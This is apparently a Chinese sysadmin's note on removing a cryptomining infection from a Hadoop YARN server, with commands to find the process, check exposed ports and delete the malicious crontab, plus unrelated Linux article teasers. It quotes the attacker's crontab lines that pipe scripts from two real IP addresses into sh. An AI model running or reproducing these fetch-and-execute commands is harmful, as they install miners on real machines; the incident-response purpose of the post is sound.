阿里云出现挖矿程序

Linux根绝Pid查看进程名

top命令查看占用CPU高的进程

ps -aux | grep PID号

ps -ef | grep PID号

查看yarn程序的信息

ps -ef | grep yarn
yarn 46185 1 99 May03 ?  4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf

yarn挖矿程序
* * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&

ps -ef | grep yarn
yarn 46185 1 99 May03 ?  4 - 19 : 04 : 28 / tmp / java - c / tmp / w.conf

 tcp        0      1 172.31.**.**:44128         185.222.210.59:80           SYN_SENT    27001/wget
 
 参考网站
 https://labitacoranet.wordpress.com/2018/05/16/forensic-analysis-of-a-cryptocurrency-mining-attack-in-a-big-data-cluster/
 https://zhangnew.com/hadoop-yarn-safe.html
 https://blog.csdn.net/BleakRed/article/details/80625551
 https://www.linuxidc.com/Linux/2014-09/106497.htm
 https://www.jb51.net/hack/186589.html
 
 http://www.freebuf.com/vuls/173638.html
 
 8088,8090
 
 查看哪些IP连接过该端口
 netstat -anp |grep 8042

一般是8088端口入侵,可以禁止外网访问8088端口

删除crontab的任务

crontab -l -u yarn

ps -ef | grep yarn

crontab -r -u yarn

删除不相干文件/var/tmp/java

Logo
Linux

更多推荐

网卡速率和双工模式的配置

http://linux.chinaitlab.com/system/792187.html1、mii-tool 配置网络设备协商方式的工具;    1.1 mii-tool 介绍;    mii-tool - view, manipulate media-independent interface status (mii-tool 是查看,管理介质的网络接口的状态)

avatar Linux

Linux虚拟文件系统之文件系统卸载(sys_umount())

Linux中卸载文件系统由umount系统调用实现,入口函数为sys_umount()。较于文件系统的安装较为简单,下面是具体的实现。1. /*sys_umont系统调用*/2. SYSCALL_DEFINE2(umount, char __user *, name, int, flags)3. {4.struct path path;

avatar Linux

Linux系统下超级终端Minicom的使用方法(例如:连接交换机,路由器等)转http://baike.baidu.com/view/2911642.htm?fr=ala0_1

<br />  Linux系统下超级终端Minicom的使用方法 <br />  Linux下的Minicom的功能与下的超级终端功能相似,适于在通过超级终端对设备的管理以及对嵌入操作系统的升级,现写出Minicom的使用手册: <br />  1. 启动minicom <br />  以root权限登录系统 <br />  使用命令 <br />  minicom –s 则minicom启动,屏

avatar Linux